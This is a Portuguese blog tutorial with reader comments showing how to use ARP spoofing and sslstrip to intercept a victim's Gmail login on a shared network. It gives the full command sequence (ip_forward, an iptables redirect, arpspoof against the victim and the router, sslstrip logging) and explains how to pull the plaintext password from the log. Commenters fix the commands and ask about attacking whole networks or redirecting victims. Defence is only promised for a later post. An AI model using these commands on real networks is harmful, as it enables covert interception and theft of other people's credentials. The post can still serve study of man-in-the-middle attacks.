ArpSpoofing e SSlstrip em ação.

Olá bloggers.

Por hoje tenho uma pequena amostra do quão perigoso pode ser estar conectado em qualquer rede sem a segurança daquelas que tantos de nós gostamos.

Por hoje, vou usar ArpSpoofing com Sslstrip para obter uma senha do Gmail. Para tornar o ambiente mais controlado, criei uma conta chamada "testarp@gmail.com".

E como não gosto muito dos preâmbulos, vamos ao que interessa.

Não sou responsável em nenhum momento pelo que eles podem fazer com as informações a seguir. Eu faço isso exclusivamente para fins educacionais

AMBIENTE

Para este teste, o que temos é o seguinte:

1. Atacante: É meu desktop ou computador desktop que tem Debian Wheezy. De repositórios você pode instalar sslstrip y dsniff para conseguir ter harpspoofing

2. Vítima: A vítima é um Tablet Android que só quer ver seu e-mail pelo navegador.

3. O meio: O meio é meu Roteador Cisco DPC2425

ENDEREÇOS.

Endereço do invasor: 172.26.0.2

Endereço do roteador 172.26.0.1

Endereço da vítima: 172.26.0.8

ATAQUE:

Para entender um pouco mais como o ataque funciona, você pode ir ao meu antigo POST

A primeira coisa que faremos para este ataque é ativar o forward para que nosso computador possa encaminhar as informações para a vítima sem que ela perceba. (Caso contrário, seria um ataque de negação de serviços)

Para isso usaremos:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Cada comando em uma janela de console direta.

Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo

instantâneo1

Então, como vamos conseguir o que queremos?

Vamos primeiro inserir nosso e-mail no Tablet. Durante o login, vemos que milhares e milhares de coisas aparecem em nosso console.

Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano

nano desdelinux

com Control + W, procuramos algo chamado POST SEGURO.

E veremos algo assim.

instantâneo2

Entre aquela enorme linha que não pode ser vista está o e-mail e a senha da vítima.

Então, corremos para a direita até finalmente ver a luz no fim do túnel.

instantâneo3

Em outra ocasião, veremos como podemos nos proteger um pouco desses ataques.

lembranças


Deixe um comentário

Seu endereço de email não será publicado. Campos obrigatórios são marcados com *

*

*

  1. Responsável pelos dados: Miguel Ángel Gatón
  2. Finalidade dos dados: Controle de SPAM, gerenciamento de comentários.
  3. Legitimação: Seu consentimento
  4. Comunicação de dados: Os dados não serão comunicados a terceiros, exceto por obrigação legal.
  5. Armazenamento de dados: banco de dados hospedado pela Occentus Networks (UE)
  6. Direitos: A qualquer momento você pode limitar, recuperar e excluir suas informações.

  1.   @Jlcmux dito

    Aproveito para dizer que quando o post foi publicado, os comandos não estavam corretos.

    O comando iptables no final está faltando o 8080 que está em outra linha. E então os comandos arpspoof estavam todos na mesma linha. Cada comando estando em uma linha diferente.

    Espero que o editor veja e possa consertar.

    Saudações.

    1.    Manuel da Fonte dito

      Eu fiz as correções que você mencionou, tudo bem?

      Se você for inserir código em uma entrada preferencial, use a visualização HTML e verifique se o artigo está correto antes de enviá-lo para pendente. Obrigado.

  2.   Luis dito

    É assustador saber que aqueles de nós que não temos conhecimento são tão vulneráveis. Informação muito boa mesmo quando entendo pouco do assunto percebo a importância. Obrigado!
    lembranças

  3.   moela dito

    Mas isso só funciona se o invasor e a vítima estiverem na mesma rede. Em qualquer caso, parece-me que se (estando na mesma rede) você se conectar usando HTTPS, isso não acontece porque os dados são criptografados ANTES de deixar sua máquina. Se conectar por HTTP (sem S) acho que mesmo olhando o cabo de rede você vê as chaves.

    1.    @Jlcmux dito

      Não é certo. Estou hackeando uma senha do gmail e se você notar que o gmail usa https. Então? A questão é que, embora o https seja seguro, ele depende do http. Portanto, não é tão seguro.

      Não confesso tanto sobre um https que o S não é para Superman é para "seguro"

    2.    Rten dito

      funciona com ou sem https, tentei com uma distro linux mais especializada e funciona sem problemas

    3.    Manuel da Fonte dito

      Você pode usá-lo precisamente para ensinar uma lição para aqueles que roubam seu wi-fi. 😀

      É mais ou menos parecido com o que diziam há muito tempo no blog de Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Radiante dito

        Ostia, ótimo o que faz! / E eles falam para o meu paranóico toda vez que eu uso a VPN quando eles vão checar a conta bancária ...). Aliás, você tem que ver o quão cínico as pessoas são nos comentários ... se no fim é roubo ...

        1.    eliotime3000 dito

          Agora precisamos fazer um tutorial sobre como criar e oferecer seu próprio serviço VPN.

      2.    Daniel dito

        A história que você linkou é muito interessante, até parece digna de um livro de romance, e isso me faz lembrar quando usava a internet dos meus vizinhos e embora diga que conheço o assunto, acho que nunca consegui ver as verdadeiras dimensões do perigo que poderia por último, felizmente para mim, eles só mudaram a senha para WPA2 e foi aí que minha história com o ISP começou haha

    4.    Maurício dito

      É por isso que o título diz Sslstrip em ação.

      Funciona, desde que o atacante esteja no meio

  4.   dentro em pouco dito

    Qual onda você trabalha no prisma? -.-
    n.
    Do que está à espera para enviar o seu pedido XD
    lembranças
    bom post

  5.   Auros Zx dito

    Interessante, vou fazer um teste educativo depois ... Talvez até pudesse tirar a senha do WiFi e me divertir um pouco 😛
    Por acaso, você pode fazer algo semelhante para enviar páginas diferentes daquelas que o destino solicitou? Por exemplo, eles querem abrir o Facebook e eu os redireciono para o Google? 😛

    1.    @Jlcmux dito

      Sim. Mas é tudo um rolo muito diferente.

      Talvez eu poste mais tarde.

  6.   último novato dito

    post muito bom, esses tópicos são muito educativos, agora precisamos ser capazes de neutralizar esse ataque, já que alguns (como eu) se conectam a redes públicas (a universidade por exemplo) seria útil evitá-lo.

    Saudações!

  7.   apenas-outro-dl-usuário dito

    Não funcionou para mim 🙁

  8.   Uau dito

    Algo me falha aqui, além do fato de que as conexões https são criptografadas através de um certificado de servidor (uma vez que você tem o certificado em sua máquina, seu navegador se encarrega da criptografia) com iptables você redireciona a porta 80 (http), não 443 que é https

    1.    @Jlcmux dito

      Também achei. A questão é que, embora https seja "seguro", infelizmente depende do http. Assim, o sslstrip tira vantagem disso, faz o navegador acreditar que está usando credenciais https, mas não está.

      1.    Uau dito

        puta merda! mas o navegador deve ver um aviso como "este certificado vem de um site suspeito ou algo parecido" ... Com certeza terei que fazer testes XD

        1.    @Jlcmux dito

          Não, absolutamente nada sai.

  9.   apenas-outro-dl-usuário dito

    Finalmente funcionou para mim
    Estou conectado a uma rede WEP com senha e mesmo assim me mostrou a senha diretamente.

    Uma consulta. Você pode fazer o mesmo procedimento, mas para todos os computadores que estão conectados na rede, em vez de ter uma única vítima?

    1.    @Jlcmux dito

      Sim, pode. Mas não fiz experimentos. Experimente você mesmo e diga-nos como foi.

  10.   sinnick19 dito

    A única coisa que consigo com isso é que a máquina da vítima fica offline, mas o sslstrip não me mostra nada: /

    1.    @Jlcmux dito

      Você deve desativar o firewall por um momento. Ou pelo menos habilite conexões de entrada.

  11.   Mr Black dito

    Probe e eu só conseguíamos ver o nome de usuário e senha da página do facebook, no gmail não encontrei nenhum resultado no log, também só precisava de uma linha de arpspoof «arpspoof -i -t«. Por outro lado, a máquina da vítima não conseguiu abrir algumas páginas. Vou continuar investigando, é muito interessante. Uma ajuda para quem usa o Manjaro, os pacotes a instalar são: dsniff (aqui é arpspoff), twisted e python2-pyopenssl. Sslstrip pode ser baixado aqui: http://www.thoughtcrime.org/software/sslstrip/
    Para executá-lo $ python2 sslstrip.py
    Saudações.

  12.   Mr Black dito

    Não saiu, mas a linha arpspoof é: #arpspoof -i int -t ip-Victim ip-router

  13.   Gilbert dito

    olha eu faço exatamente o que você diz:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    O problema é que a vítima, que é outro pc que tenho aqui no meu quarto, fica sem conexão a ponto de eu ter que reiniciar o roteador, o que posso fazer, me ajudar.

    Outra coisa, estou trabalhando com uma máquina virtual, e quando executo o comando iwconfig não aparece wlan0, nem quando executo ifconfig, porém, se tenho internet na minha máquina virtual, que com interface eth0.